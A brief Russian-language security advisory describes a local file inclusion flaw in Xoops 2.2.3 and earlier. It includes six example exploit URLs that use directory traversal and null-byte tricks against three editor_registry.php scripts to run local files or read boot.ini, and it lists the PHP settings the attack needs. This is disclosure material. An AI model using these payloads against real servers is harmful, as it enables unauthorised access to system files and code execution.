Программа: Xoops 2.2.3 и более ранние версии 

Уязвимость позволяет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «xoopsConfig[language]» в сценарии «class/xoopseditor/textarea/editor_registry.php». Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе. 

Пример:

http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00 

Для успешной эксплуатации уязвимости, опция «magic_quotes_gpc» должна быть выключена, а опция “register_globals” — включена.

Оставить мнение